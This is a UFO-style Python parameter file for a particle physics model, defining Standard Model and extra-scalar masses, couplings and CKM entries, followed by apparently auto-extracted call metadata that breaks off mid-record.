CKM3x3 = Parameter(name = 'CKM3x3',
nature = 'internal',
type = 'complex',
value = '1',
texname = '\\text{CKM3x3}')
MW = Parameter(name = 'MW',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(MZ**2/2. + cmath.sqrt(MZ**4/4. - (aEW*cmath.pi*MZ**2)/(Gf*cmath.sqrt(2))))',
texname = 'M_W')
ee = Parameter(name = 'ee',
nature = 'internal',
type = 'real',
value = '2*cmath.sqrt(aEW)*cmath.sqrt(cmath.pi)',
texname = 'e')
sw2 = Parameter(name = 'sw2',
nature = 'internal',
type = 'real',
value = '1 - MW**2/MZ**2',
texname = '\\text{sw2}')
cw = Parameter(name = 'cw',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(1 - sw2)',
texname = 'c_w')
sw = Parameter(name = 'sw',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(sw2)',
texname = 's_w')
g1 = Parameter(name = 'g1',
nature = 'internal',
type = 'real',
value = 'ee/cw',
texname = 'g_1')
gw = Parameter(name = 'gw',
nature = 'internal',
type = 'real',
value = 'ee/sw',
texname = 'g_w')
vev = Parameter(name = 'vev',
nature = 'internal',
type = 'real',
value = '(2*MW*sw)/ee',
texname = '\\text{vev}')
mfi = Parameter(name = 'mfi',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(100 - (kq*vev**2)/2.)',
texname = 'M_{\\text{fi}}')
AH = Parameter(name = 'AH',
nature = 'internal',
type = 'real',
value = '(47*ee**2*(1 - (2*MH**4)/(987.*MT**4) - (14*MH**2)/(705.*MT**2) + (213*MH**12)/(2.634632e7*MW**12) + (5*MH**10)/(119756.*MW**10) + (41*MH**8)/(180950.*MW**8) + (87*MH**6)/(65800.*MW**6) + (57*MH**4)/(6580.*MW**4) + (33*MH**2)/(470.*MW**2)))/(72.*cmath.pi**2*vev)',
texname = 'A_H')
GH = Parameter(name = 'GH',
nature = 'internal',
type = 'real',
value = '-(G**2*(1 + (13*MH**6)/(16800.*MT**6) + MH**4/(168.*MT**4) + (7*MH**2)/(120.*MT**2)))/(12.*cmath.pi**2*vev)',
texname = 'G_H')
Gphi = Parameter(name = 'Gphi',
nature = 'internal',
type = 'real',
value = '-(G**2*(1 + MH**6/(560.*MT**6) + MH**4/(90.*MT**4) + MH**2/(12.*MT**2)))/(8.*cmath.pi**2*vev)',
texname = 'G_h')
lam = Parameter(name = 'lam',
nature = 'internal',
type = 'real',
value = 'MH**2/(2.*vev**2)',
texname = '\\text{lam}')
yb = Parameter(name = 'yb',
nature = 'internal',
type = 'real',
value = '(ymb*cmath.sqrt(2))/vev',
texname = '\\text{yb}')
yc = Parameter(name = 'yc',
nature = 'internal',
type = 'real',
value = '(ymc*cmath.sqrt(2))/vev',
texname = '\\text{yc}')
ydo = Parameter(name = 'ydo',
nature = 'internal',
type = 'real',
value = '(ymdo*cmath.sqrt(2))/vev',
texname = '\\text{ydo}')
ye = Parameter(name = 'ye',
nature = 'internal',
type = 'real',
value = '(yme*cmath.sqrt(2))/vev',
texname = '\\text{ye}')
ym = Parameter(name = 'ym',
nature = 'internal',
type = 'real',
value = '(ymm*cmath.sqrt(2))/vev',
texname = '\\text{ym}')
ys = Parameter(name = 'ys',
nature = 'internal',
type = 'real',
value = '(yms*cmath.sqrt(2))/vev',
texname = '\\text{ys}')
yt = Parameter(name = 'yt',
nature = 'internal',
type = 'real',
value = '(ymt*cmath.sqrt(2))/vev',
texname = '\\text{yt}')
ytau = Parameter(name = 'ytau',
nature = 'internal',
type = 'real',
value = '(ymtau*cmath.sqrt(2))/vev',
texname = '\\text{ytau}')
yup = Parameter(name = 'yup',
nature = 'internal',
type = 'real',
value = '(ymup*cmath.sqrt(2))/vev',
texname = '\\text{yup}')
muH = Parameter(name = 'muH',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(lam*vev**2)',
texname = '\\mu')
| [
"object_library.Parameter"
]
| [((363, 448), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ZERO"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""0.0"""', 'texname': '"""0"""'}), "(name='ZERO', nature='internal', type='real', value='0.0', texname='0'\n )\n", (372, 448), False, 'from object_library import all_parameters, Parameter\n'), ((557, 687), 'object_library.Parameter', 'Parameter', ([], {'name': '"""cabi"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.227736)', 'texname': '"""\\\\theta _c"""', 'lhablock': '"""CKMBLOCK"""', 'lhacode': '[1]'}), "(name='cabi', nature='external', type='real', value=0.227736,\n texname='\\\\theta _c', lhablock='CKMBLOCK', lhacode=[1])\n", (566, 687), False, 'from object_library import all_parameters, Parameter\n'), ((811, 942), 'object_library.Parameter', 'Parameter', ([], {'name': '"""aEWM1"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(127.9)', 'texname': '"""\\\\text{aEWM1}"""', 'lhablock': '"""SMINPUTS"""', 'lhacode': '[1]'}), "(name='aEWM1', nature='external', type='real', value=127.9,\n texname='\\\\text{aEWM1}', lhablock='SMINPUTS', lhacode=[1])\n", (820, 942), False, 'from object_library import all_parameters, Parameter\n'), ((1069, 1193), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Gf"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.16637e-05)', 'texname': '"""G_f"""', 'lhablock': '"""SMINPUTS"""', 'lhacode': '[2]'}), "(name='Gf', nature='external', type='real', value=1.16637e-05,\n texname='G_f', lhablock='SMINPUTS', lhacode=[2])\n", (1078, 1193), False, 'from object_library import all_parameters, Parameter\n'), ((1303, 1430), 'object_library.Parameter', 'Parameter', ([], {'name': '"""aS"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.1184)', 'texname': '"""\\\\alpha _s"""', 'lhablock': '"""SMINPUTS"""', 'lhacode': '[3]'}), "(name='aS', nature='external', type='real', value=0.1184, texname=\n '\\\\alpha _s', lhablock='SMINPUTS', lhacode=[3])\n", (1312, 1430), False, 'from object_library import all_parameters, Parameter\n'), ((1540, 1669), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymdo"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00504)', 'texname': '"""\\\\text{ymdo}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[1]'}), "(name='ymdo', nature='external', type='real', value=0.00504,\n texname='\\\\text{ymdo}', lhablock='YUKAWA', lhacode=[1])\n", (1549, 1669), False, 'from object_library import all_parameters, Parameter\n'), ((1792, 1921), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymup"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00255)', 'texname': '"""\\\\text{ymup}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[2]'}), "(name='ymup', nature='external', type='real', value=0.00255,\n texname='\\\\text{ymup}', lhablock='YUKAWA', lhacode=[2])\n", (1801, 1921), False, 'from object_library import all_parameters, Parameter\n'), ((2043, 2169), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yms"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.101)', 'texname': '"""\\\\text{yms}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[3]'}), "(name='yms', nature='external', type='real', value=0.101, texname=\n '\\\\text{yms}', lhablock='YUKAWA', lhacode=[3])\n", (2052, 2169), False, 'from object_library import all_parameters, Parameter\n'), ((2284, 2409), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymc"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.27)', 'texname': '"""\\\\text{ymc}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[4]'}), "(name='ymc', nature='external', type='real', value=1.27, texname=\n '\\\\text{ymc}', lhablock='YUKAWA', lhacode=[4])\n", (2293, 2409), False, 'from object_library import all_parameters, Parameter\n'), ((2524, 2648), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymb"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(4.7)', 'texname': '"""\\\\text{ymb}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[5]'}), "(name='ymb', nature='external', type='real', value=4.7, texname=\n '\\\\text{ymb}', lhablock='YUKAWA', lhacode=[5])\n", (2533, 2648), False, 'from object_library import all_parameters, Parameter\n'), ((2763, 2887), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymt"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(172)', 'texname': '"""\\\\text{ymt}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[6]'}), "(name='ymt', nature='external', type='real', value=172, texname=\n '\\\\text{ymt}', lhablock='YUKAWA', lhacode=[6])\n", (2772, 2887), False, 'from object_library import all_parameters, Parameter\n'), ((3002, 3131), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yme"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.000511)', 'texname': '"""\\\\text{yme}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[11]'}), "(name='yme', nature='external', type='real', value=0.000511,\n texname='\\\\text{yme}', lhablock='YUKAWA', lhacode=[11])\n", (3011, 3131), False, 'from object_library import all_parameters, Parameter\n'), ((3247, 3375), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymm"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.10566)', 'texname': '"""\\\\text{ymm}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[13]'}), "(name='ymm', nature='external', type='real', value=0.10566,\n texname='\\\\text{ymm}', lhablock='YUKAWA', lhacode=[13])\n", (3256, 3375), False, 'from object_library import all_parameters, Parameter\n'), ((3493, 3623), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymtau"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.777)', 'texname': '"""\\\\text{ymtau}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[15]'}), "(name='ymtau', nature='external', type='real', value=1.777,\n texname='\\\\text{ymtau}', lhablock='YUKAWA', lhacode=[15])\n", (3502, 3623), False, 'from object_library import all_parameters, Parameter\n'), ((3750, 3868), 'object_library.Parameter', 'Parameter', ([], {'name': '"""kq"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.001)', 'texname': '"""k_q"""', 'lhablock': '"""FRBlock"""', 'lhacode': '[1]'}), "(name='kq', nature='external', type='real', value=0.001, texname=\n 'k_q', lhablock='FRBlock', lhacode=[1])\n", (3759, 3868), False, 'from object_library import all_parameters, Parameter\n'), ((3978, 4107), 'object_library.Parameter', 'Parameter', ([], {'name': '"""lamf"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.1)', 'texname': '"""l_{\\\\text{fi}}"""', 'lhablock': '"""FRBlock"""', 'lhacode': '[2]'}), "(name='lamf', nature='external', type='real', value=0.1, texname=\n 'l_{\\\\text{fi}}', lhablock='FRBlock', lhacode=[2])\n", (3987, 4107), False, 'from object_library import all_parameters, Parameter\n'), ((4230, 4364), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf1x1"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf1x1}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[1, 1]'}), "(name='yf1x1', nature='external', type='complex', value=0, texname\n ='\\\\text{yf1x1}', lhablock='FRBlock6', lhacode=[1, 1])\n", (4239, 4364), False, 'from object_library import all_parameters, Parameter\n'), ((4493, 4627), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf1x2"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf1x2}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[1, 2]'}), "(name='yf1x2', nature='external', type='complex', value=0, texname\n ='\\\\text{yf1x2}', lhablock='FRBlock6', lhacode=[1, 2])\n", (4502, 4627), False, 'from object_library import all_parameters, Parameter\n'), ((4756, 4890), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf1x3"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf1x3}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[1, 3]'}), "(name='yf1x3', nature='external', type='complex', value=0, texname\n ='\\\\text{yf1x3}', lhablock='FRBlock6', lhacode=[1, 3])\n", (4765, 4890), False, 'from object_library import all_parameters, Parameter\n'), ((5019, 5153), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf2x1"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf2x1}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[2, 1]'}), "(name='yf2x1', nature='external', type='complex', value=0, texname\n ='\\\\text{yf2x1}', lhablock='FRBlock6', lhacode=[2, 1])\n", (5028, 5153), False, 'from object_library import all_parameters, Parameter\n'), ((5282, 5416), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf2x2"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf2x2}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[2, 2]'}), "(name='yf2x2', nature='external', type='complex', value=0, texname\n ='\\\\text{yf2x2}', lhablock='FRBlock6', lhacode=[2, 2])\n", (5291, 5416), False, 'from object_library import all_parameters, Parameter\n'), ((5545, 5682), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf2x3"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(1e-06)', 'texname': '"""\\\\text{yf2x3}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[2, 3]'}), "(name='yf2x3', nature='external', type='complex', value=1e-06,\n texname='\\\\text{yf2x3}', lhablock='FRBlock6', lhacode=[2, 3])\n", (5554, 5682), False, 'from object_library import all_parameters, Parameter\n'), ((5812, 5946), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf3x1"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf3x1}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[3, 1]'}), "(name='yf3x1', nature='external', type='complex', value=0, texname\n ='\\\\text{yf3x1}', lhablock='FRBlock6', lhacode=[3, 1])\n", (5821, 5946), False, 'from object_library import all_parameters, Parameter\n'), ((6075, 6209), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf3x2"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf3x2}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[3, 2]'}), "(name='yf3x2', nature='external', type='complex', value=0, texname\n ='\\\\text{yf3x2}', lhablock='FRBlock6', lhacode=[3, 2])\n", (6084, 6209), False, 'from object_library import all_parameters, Parameter\n'), ((6338, 6472), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf3x3"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf3x3}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[3, 3]'}), "(name='yf3x3', nature='external', type='complex', value=0, texname\n ='\\\\text{yf3x3}', lhablock='FRBlock6', lhacode=[3, 3])\n", (6347, 6472), False, 'from object_library import all_parameters, Parameter\n'), ((6598, 6723), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MZ"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(91.1876)', 'texname': '"""\\\\text{MZ}"""', 'lhablock': '"""MASS"""', 'lhacode': '[23]'}), "(name='MZ', nature='external', type='real', value=91.1876, texname\n ='\\\\text{MZ}', lhablock='MASS', lhacode=[23])\n", (6607, 6723), False, 'from object_library import all_parameters, Parameter\n'), ((6831, 6956), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Me"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.000511)', 'texname': '"""\\\\text{Me}"""', 'lhablock': '"""MASS"""', 'lhacode': '[11]'}), "(name='Me', nature='external', type='real', value=0.000511,\n texname='\\\\text{Me}', lhablock='MASS', lhacode=[11])\n", (6840, 6956), False, 'from object_library import all_parameters, Parameter\n'), ((7066, 7192), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MMU"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.10566)', 'texname': '"""\\\\text{MMU}"""', 'lhablock': '"""MASS"""', 'lhacode': '[13]'}), "(name='MMU', nature='external', type='real', value=0.10566,\n texname='\\\\text{MMU}', lhablock='MASS', lhacode=[13])\n", (7075, 7192), False, 'from object_library import all_parameters, Parameter\n'), ((7308, 7433), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MTA"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.777)', 'texname': '"""\\\\text{MTA}"""', 'lhablock': '"""MASS"""', 'lhacode': '[15]'}), "(name='MTA', nature='external', type='real', value=1.777, texname=\n '\\\\text{MTA}', lhablock='MASS', lhacode=[15])\n", (7317, 7433), False, 'from object_library import all_parameters, Parameter\n'), ((7547, 7662), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MU"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00255)', 'texname': '"""M"""', 'lhablock': '"""MASS"""', 'lhacode': '[2]'}), "(name='MU', nature='external', type='real', value=0.00255, texname\n ='M', lhablock='MASS', lhacode=[2])\n", (7556, 7662), False, 'from object_library import all_parameters, Parameter\n'), ((7770, 7891), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MC"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.27)', 'texname': '"""\\\\text{MC}"""', 'lhablock': '"""MASS"""', 'lhacode': '[4]'}), "(name='MC', nature='external', type='real', value=1.27, texname=\n '\\\\text{MC}', lhablock='MASS', lhacode=[4])\n", (7779, 7891), False, 'from object_library import all_parameters, Parameter\n'), ((7999, 8119), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MT"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(172)', 'texname': '"""\\\\text{MT}"""', 'lhablock': '"""MASS"""', 'lhacode': '[6]'}), "(name='MT', nature='external', type='real', value=172, texname=\n '\\\\text{MT}', lhablock='MASS', lhacode=[6])\n", (8008, 8119), False, 'from object_library import all_parameters, Parameter\n'), ((8227, 8351), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MD"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00504)', 'texname': '"""\\\\text{MD}"""', 'lhablock': '"""MASS"""', 'lhacode': '[1]'}), "(name='MD', nature='external', type='real', value=0.00504, texname\n ='\\\\text{MD}', lhablock='MASS', lhacode=[1])\n", (8236, 8351), False, 'from object_library import all_parameters, Parameter\n'), ((8459, 8581), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MS"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.101)', 'texname': '"""\\\\text{MS}"""', 'lhablock': '"""MASS"""', 'lhacode': '[3]'}), "(name='MS', nature='external', type='real', value=0.101, texname=\n '\\\\text{MS}', lhablock='MASS', lhacode=[3])\n", (8468, 8581), False, 'from object_library import all_parameters, Parameter\n'), ((8689, 8809), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MB"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(4.7)', 'texname': '"""\\\\text{MB}"""', 'lhablock': '"""MASS"""', 'lhacode': '[5]'}), "(name='MB', nature='external', type='real', value=4.7, texname=\n '\\\\text{MB}', lhablock='MASS', lhacode=[5])\n", (8698, 8809), False, 'from object_library import all_parameters, Parameter\n'), ((8917, 9038), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MH"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(125)', 'texname': '"""\\\\text{MH}"""', 'lhablock': '"""MASS"""', 'lhacode': '[25]'}), "(name='MH', nature='external', type='real', value=125, texname=\n '\\\\text{MH}', lhablock='MASS', lhacode=[25])\n", (8926, 9038), False, 'from object_library import all_parameters, Parameter\n'), ((9146, 9272), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MP"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(120)', 'texname': '"""\\\\text{MP}"""', 'lhablock': '"""MASS"""', 'lhacode': '[9000005]'}), "(name='MP', nature='external', type='real', value=120, texname=\n '\\\\text{MP}', lhablock='MASS', lhacode=[9000005])\n", (9155, 9272), False, 'from object_library import all_parameters, Parameter\n'), ((9381, 9508), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Mfi"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(10)', 'texname': '"""\\\\text{Mfi}"""', 'lhablock': '"""MASS"""', 'lhacode': '[9000006]'}), "(name='Mfi', nature='external', type='real', value=10, texname=\n '\\\\text{Mfi}', lhablock='MASS', lhacode=[9000006])\n", (9390, 9508), False, 'from object_library import all_parameters, Parameter\n'), ((9622, 9747), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WZ"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(2.4952)', 'texname': '"""\\\\text{WZ}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[23]'}), "(name='WZ', nature='external', type='real', value=2.4952, texname=\n '\\\\text{WZ}', lhablock='DECAY', lhacode=[23])\n", (9631, 9747), False, 'from object_library import all_parameters, Parameter\n'), ((9855, 9979), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WW"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(2.085)', 'texname': '"""\\\\text{WW}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[24]'}), "(name='WW', nature='external', type='real', value=2.085, texname=\n '\\\\text{WW}', lhablock='DECAY', lhacode=[24])\n", (9864, 9979), False, 'from object_library import all_parameters, Parameter\n'), ((10087, 10214), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WT"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.50833649)', 'texname': '"""\\\\text{WT}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[6]'}), "(name='WT', nature='external', type='real', value=1.50833649,\n texname='\\\\text{WT}', lhablock='DECAY', lhacode=[6])\n", (10096, 10214), False, 'from object_library import all_parameters, Parameter\n'), ((10323, 10451), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WH"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00589569)', 'texname': '"""\\\\text{WH}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[25]'}), "(name='WH', nature='external', type='real', value=0.00589569,\n texname='\\\\text{WH}', lhablock='DECAY', lhacode=[25])\n", (10332, 10451), False, 'from object_library import all_parameters, Parameter\n'), ((10561, 10699), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WH1"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00575308848)', 'texname': '"""\\\\text{WH1}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[9000005]'}), "(name='WH1', nature='external', type='real', value=0.00575308848,\n texname='\\\\text{WH1}', lhablock='DECAY', lhacode=[9000005])\n", (10570, 10699), False, 'from object_library import all_parameters, Parameter\n'), ((10815, 10951), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Wfi"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(6.03044e-09)', 'texname': '"""\\\\text{Wfi}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[9000006]'}), "(name='Wfi', nature='external', type='real', value=6.03044e-09,\n texname='\\\\text{Wfi}', lhablock='DECAY', lhacode=[9000006])\n", (10824, 10951), False, 'from object_library import all_parameters, Parameter\n'), ((11066, 11173), 'object_library.Parameter', 'Parameter', ([], {'name': '"""aEW"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""1/aEWM1"""', 'texname': '"""\\\\alpha _{\\\\text{EW}}"""'}), "(name='aEW', nature='internal', type='real', value='1/aEWM1',\n texname='\\\\alpha _{\\\\text{EW}}')\n", (11075, 11173), False, 'from object_library import all_parameters, Parameter\n'), ((11249, 11365), 'object_library.Parameter', 'Parameter', ([], {'name': '"""G"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""2*cmath.sqrt(aS)*cmath.sqrt(cmath.pi)"""', 'texname': '"""G"""'}), "(name='G', nature='internal', type='real', value=\n '2*cmath.sqrt(aS)*cmath.sqrt(cmath.pi)', texname='G')\n", (11258, 11365), False, 'from object_library import all_parameters, Parameter\n'), ((11437, 11552), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM1x1"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""cmath.cos(cabi)"""', 'texname': '"""\\\\text{CKM1x1}"""'}), "(name='CKM1x1', nature='internal', type='complex', value=\n 'cmath.cos(cabi)', texname='\\\\text{CKM1x1}')\n", (11446, 11552), False, 'from object_library import all_parameters, Parameter\n'), ((11644, 11759), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM1x2"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""cmath.sin(cabi)"""', 'texname': '"""\\\\text{CKM1x2}"""'}), "(name='CKM1x2', nature='internal', type='complex', value=\n 'cmath.sin(cabi)', texname='\\\\text{CKM1x2}')\n", (11653, 11759), False, 'from object_library import all_parameters, Parameter\n'), ((11851, 11951), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM1x3"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM1x3}"""'}), "(name='CKM1x3', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM1x3}')\n", (11860, 11951), False, 'from object_library import all_parameters, Parameter\n'), ((12044, 12160), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM2x1"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""-cmath.sin(cabi)"""', 'texname': '"""\\\\text{CKM2x1}"""'}), "(name='CKM2x1', nature='internal', type='complex', value=\n '-cmath.sin(cabi)', texname='\\\\text{CKM2x1}')\n", (12053, 12160), False, 'from object_library import all_parameters, Parameter\n'), ((12252, 12367), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM2x2"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""cmath.cos(cabi)"""', 'texname': '"""\\\\text{CKM2x2}"""'}), "(name='CKM2x2', nature='internal', type='complex', value=\n 'cmath.cos(cabi)', texname='\\\\text{CKM2x2}')\n", (12261, 12367), False, 'from object_library import all_parameters, Parameter\n'), ((12459, 12559), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM2x3"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM2x3}"""'}), "(name='CKM2x3', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM2x3}')\n", (12468, 12559), False, 'from object_library import all_parameters, Parameter\n'), ((12652, 12752), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM3x1"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM3x1}"""'}), "(name='CKM3x1', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM3x1}')\n", (12661, 12752), False, 'from object_library import all_parameters, Parameter\n'), ((12845, 12945), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM3x2"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM3x2}"""'}), "(name='CKM3x2', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM3x2}')\n", (12854, 12945), False, 'from object_library import all_parameters, Parameter\n'), ((13038, 13138), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM3x3"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""1"""', 'texname': '"""\\\\text{CKM3x3}"""'}), "(name='CKM3x3', nature='internal', type='complex', value='1',\n texname='\\\\text{CKM3x3}')\n", (13047, 13138), False, 'from object_library import all_parameters, Parameter\n'), ((13227, 13399), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MW"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(MZ**2/2. + cmath.sqrt(MZ**4/4. - (aEW*cmath.pi*MZ**2)/(Gf*cmath.sqrt(2))))"""', 'texname': '"""M_W"""'}), "(name='MW', nature='internal', type='real', value=\n 'cmath.sqrt(MZ**2/2. + cmath.sqrt(MZ**4/4. - (aEW*cmath.pi*MZ**2)/(Gf*cmath.sqrt(2))))'\n , texname='M_W')\n", (13236, 13399), False, 'from object_library import all_parameters, Parameter\n'), ((13466, 13584), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ee"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""2*cmath.sqrt(aEW)*cmath.sqrt(cmath.pi)"""', 'texname': '"""e"""'}), "(name='ee', nature='internal', type='real', value=\n '2*cmath.sqrt(aEW)*cmath.sqrt(cmath.pi)', texname='e')\n", (13475, 13584), False, 'from object_library import all_parameters, Parameter\n'), ((13657, 13763), 'object_library.Parameter', 'Parameter', ([], {'name': '"""sw2"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""1 - MW**2/MZ**2"""', 'texname': '"""\\\\text{sw2}"""'}), "(name='sw2', nature='internal', type='real', value=\n '1 - MW**2/MZ**2', texname='\\\\text{sw2}')\n", (13666, 13763), False, 'from object_library import all_parameters, Parameter\n'), ((13839, 13940), 'object_library.Parameter', 'Parameter', ([], {'name': '"""cw"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(1 - sw2)"""', 'texname': '"""c_w"""'}), "(name='cw', nature='internal', type='real', value=\n 'cmath.sqrt(1 - sw2)', texname='c_w')\n", (13848, 13940), False, 'from object_library import all_parameters, Parameter\n'), ((14012, 14109), 'object_library.Parameter', 'Parameter', ([], {'name': '"""sw"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(sw2)"""', 'texname': '"""s_w"""'}), "(name='sw', nature='internal', type='real', value=\n 